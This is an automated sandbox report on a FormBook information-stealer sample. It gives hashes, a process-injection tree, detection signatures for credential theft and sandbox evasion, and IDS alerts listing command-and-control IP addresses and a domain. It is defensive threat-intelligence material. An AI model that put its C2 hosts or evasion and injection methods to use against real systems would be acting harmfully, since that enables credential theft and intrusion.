Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
suBpo1g13Q.exe

Overview

General Information

Sample name:suBpo1g13Q.exe
renamed because original name is a hash value
Original sample name:b7b7efd934672f580ac36002b4f9524decc68c309052dbdf16f26c48c6d1d268.exe
Analysis ID:1588629
MD5:d8ba09db25afabba3143cb47dd6b8f37
SHA1:5e19b80e13c51ac6f3e1d196e5c3b73ecefd5e98
SHA256:b7b7efd934672f580ac36002b4f9524decc68c309052dbdf16f26c48c6d1d268
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • suBpo1g13Q.exe (PID: 7188 cmdline: "C:\Users\user\Desktop\suBpo1g13Q.exe" MD5: D8BA09DB25AFABBA3143CB47DD6B8F37)
    • suBpo1g13Q.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\suBpo1g13Q.exe" MD5: D8BA09DB25AFABBA3143CB47DD6B8F37)
    • suBpo1g13Q.exe (PID: 7696 cmdline: "C:\Users\user\Desktop\suBpo1g13Q.exe" MD5: D8BA09DB25AFABBA3143CB47DD6B8F37)
      • iBkWOgpZKSoi.exe (PID: 3852 cmdline: "C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • waitfor.exe (PID: 6128 cmdline: "C:\Windows\SysWOW64\waitfor.exe" MD5: E58E152B44F20DD099C5105DE482DF24)
          • iBkWOgpZKSoi.exe (PID: 6148 cmdline: "C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7532 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.1637335809.00000000013C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.3813776931.00000000045F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.3813875432.0000000004640000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.suBpo1g13Q.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.suBpo1g13Q.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T03:23:42.399727+010028554651A Network Trojan was detected192.168.2.1051571188.114.97.380TCP
                2025-01-11T03:24:34.151744+010028554651A Network Trojan was detected192.168.2.1049981202.92.5.2380TCP
                2025-01-11T03:25:00.623837+010028554651A Network Trojan was detected192.168.2.105153113.248.169.4880TCP
                2025-01-11T03:25:14.006163+010028554651A Network Trojan was detected192.168.2.1051535209.74.77.10980TCP
                2025-01-11T03:25:27.759474+010028554651A Network Trojan was detected192.168.2.105153923.225.159.4280TCP
                2025-01-11T03:25:41.278253+010028554651A Network Trojan was detected192.168.2.105154346.30.211.3880TCP
                2025-01-11T03:25:55.128049+010028554651A Network Trojan was detected192.168.2.1051547103.224.182.24280TCP
                2025-01-11T03:26:29.880732+010028554651A Network Trojan was detected192.168.2.1051551149.88.81.19080TCP
                2025-01-11T03:26:44.091940+010028554651A Network Trojan was detected192.168.2.1051555101.35.209.18380TCP
                2025-01-11T03:26:58.020315+010028554651A Network Trojan was detected192.168.2.1051559154.23.178.23180TCP
                2025-01-11T03:27:12.561931+010028554651A Network Trojan was detected192.168.2.1051563208.91.197.3980TCP
                2025-01-11T03:27:26.533155+010028554651A Network Trojan was detected192.168.2.105156743.205.198.2980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T03:24:49.714073+010028554641A Network Trojan was detected192.168.2.105152813.248.169.4880TCP
                2025-01-11T03:24:52.334935+010028554641A Network Trojan was detected192.168.2.105152913.248.169.4880TCP
                2025-01-11T03:24:55.059812+010028554641A Network Trojan was detected192.168.2.105153013.248.169.4880TCP
                2025-01-11T03:25:06.361418+010028554641A Network Trojan was detected192.168.2.1051532209.74.77.10980TCP
                2025-01-11T03:25:08.901515+010028554641A Network Trojan was detected192.168.2.1051533209.74.77.10980TCP
                2025-01-11T03:25:11.603202+010028554641A Network Trojan was detected192.168.2.1051534209.74.77.10980TCP
                2025-01-11T03:25:20.118806+010028554641A Network Trojan was detected192.168.2.105153623.225.159.4280TCP
                2025-01-11T03:25:22.665681+010028554641A Network Trojan was detected192.168.2.105153723.225.159.4280TCP
                2025-01-11T03:25:25.197026+010028554641A Network Trojan was detected192.168.2.105153823.225.159.4280TCP
                2025-01-11T03:25:33.524521+010028554641A Network Trojan was detected192.168.2.105154046.30.211.3880TCP
                2025-01-11T03:25:36.119532+010028554641A Network Trojan was detected192.168.2.105154146.30.211.3880TCP
                2025-01-11T03:25:38.736397+010028554641A Network Trojan was detected192.168.2.105154246.30.211.3880TCP
                2025-01-11T03:25:47.517154+010028554641A Network Trojan was detected192.168.2.1051544103.224.182.24280TCP
                2025-01-11T03:25:50.025272+010028554641A Network Trojan was detected192.168.2.1051545103.224.182.24280TCP
                2025-01-11T03:25:52.613341+010028554641A Network Trojan was detected192.168.2.1051546103.224.182.24280TCP
                2025-01-11T03:26:02.403771+010028554641A Network Trojan was detected192.168.2.1051548149.88.81.19080TCP
                2025-01-11T03:26:04.947928+010028554641A Network Trojan was detected192.168.2.1051549149.88.81.19080TCP
                2025-01-11T03:26:07.494386+010028554641A Network Trojan was detected192.168.2.1051550149.88.81.19080TCP
                2025-01-11T03:26:36.338277+010028554641A Network Trojan was detected192.168.2.1051552101.35.209.18380TCP
                2025-01-11T03:26:38.905416+010028554641A Network Trojan was detected192.168.2.1051553101.35.209.18380TCP
                2025-01-11T03:26:41.522600+010028554641A Network Trojan was detected192.168.2.1051554101.35.209.18380TCP
                2025-01-11T03:26:50.384642+010028554641A Network Trojan was detected192.168.2.1051556154.23.178.23180TCP
                2025-01-11T03:26:52.949820+010028554641A Network Trojan was detected192.168.2.1051557154.23.178.23180TCP
                2025-01-11T03:26:56.104081+010028554641A Network Trojan was detected192.168.2.1051558154.23.178.23180TCP
                2025-01-11T03:27:03.811881+010028554641A Network Trojan was detected192.168.2.1051560208.91.197.3980TCP
                2025-01-11T03:27:06.348901+010028554641A Network Trojan was detected192.168.2.1051561208.91.197.3980TCP
                2025-01-11T03:27:08.955074+010028554641A Network Trojan was detected192.168.2.1051562208.91.197.3980TCP
                2025-01-11T03:27:18.813215+010028554641A Network Trojan was detected192.168.2.105156443.205.198.2980TCP
                2025-01-11T03:27:21.365405+010028554641A Network Trojan was detected192.168.2.105156543.205.198.2980TCP
                2025-01-11T03:27:23.923124+010028554641A Network Trojan was detected192.168.2.105156643.205.198.2980TCP
                2025-01-11T03:27:33.106849+010028554641A Network Trojan was detected192.168.2.1051568188.114.97.380TCP
                2025-01-11T03:27:35.682272+010028554641A Network Trojan was detected192.168.2.1051569188.114.97.380TCP
                2025-01-11T03:27:38.291581+010028554641A Network Trojan was detected192.168.2.1051570188.114.97.380TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: suBpo1g13Q.exeVirustotal: Detection: 38%Perma Link
                Source: suBpo1g13Q.exeReversingLabs: Detection: 68%
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.suBpo1g13Q.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.suBpo1g13Q.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1637335809.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3813776931.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3813875432.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3813882427.00000000022E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1638525330.00000000017C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: suBpo1g13Q.exeJoe Sandbox ML: detected
                Source: suBpo1g13Q.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: suBpo1g13Q.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: OGGCS.pdbSHA256 source: suBpo1g13Q.exe
                Source: Binary string: waitfor.pdbGCTL source: suBpo1g13Q.exe, 00000004.00000002.1636951956.0000000001007000.00000004.00000020.00020000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000003.1875642312.000000000062B000.00000004.00000020.00020000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000002.3809460967.0000000000618000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: waitfor.pdb source: suBpo1g13Q.exe, 00000004.00000002.1636951956.0000000001007000.00000004.00000020.00020000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000003.1875642312.000000000062B000.00000004.00000020.00020000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000002.3809460967.0000000000618000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iBkWOgpZKSoi.exe, 00000006.00000002.3804555588.000000000035E000.00000002.00000001.01000000.0000000C.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1709108519.000000000035E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: suBpo1g13Q.exe, 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1638712535.00000000045AE000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1636800976.00000000043F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: suBpo1g13Q.exe, suBpo1g13Q.exe, 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, waitfor.exe, 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1638712535.00000000045AE000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1636800976.00000000043F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: OGGCS.pdb source: suBpo1g13Q.exe
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 7_2_0082CB90 FindFirstFileW,FindNextFileW,FindClose,7_2_0082CB90
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4x nop then xor eax, eax7_2_00819F10
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4x nop then mov ebx, 00000004h7_2_04AB04CE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51537 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51532 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51530 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51553 -> 101.35.209.183:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49981 -> 202.92.5.23:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51534 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51533 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51541 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51555 -> 101.35.209.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51550 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51542 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51569 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51539 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51538 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51536 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51531 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51544 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51535 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51565 -> 43.205.198.29:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51543 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51529 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51540 -> 46.30.211.38:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51547 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51548 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51568 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51560 -> 208.91.197.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51551 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51559 -> 154.23.178.231:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51556 -> 154.23.178.231:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51528 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51566 -> 43.205.198.29:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51558 -> 154.23.178.231:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51545 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51549 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51563 -> 208.91.197.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51561 -> 208.91.197.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51554 -> 101.35.209.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51557 -> 154.23.178.231:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51546 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51564 -> 43.205.198.29:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51567 -> 43.205.198.29:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51570 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51552 -> 101.35.209.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51562 -> 208.91.197.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51571 -> 188.114.97.3:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.optimismbank.xyz
                Source: global trafficTCP traffic: 192.168.2.10:51525 -> 162.159.36.2:53
                Source: Joe Sandbox ViewIP Address: 101.35.209.183 101.35.209.183
                Source: Joe Sandbox ViewIP Address: 209.74.77.109 209.74.77.109
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 02:25:47 GMTserver: Apacheset-cookie: __tad=1736562347.1667970; expires=Tue, 09-Jan-2035 02:25:47 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 02:25:49 GMTserver: Apacheset-cookie: __tad=1736562349.4895586; expires=Tue, 09-Jan-2035 02:25:49 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 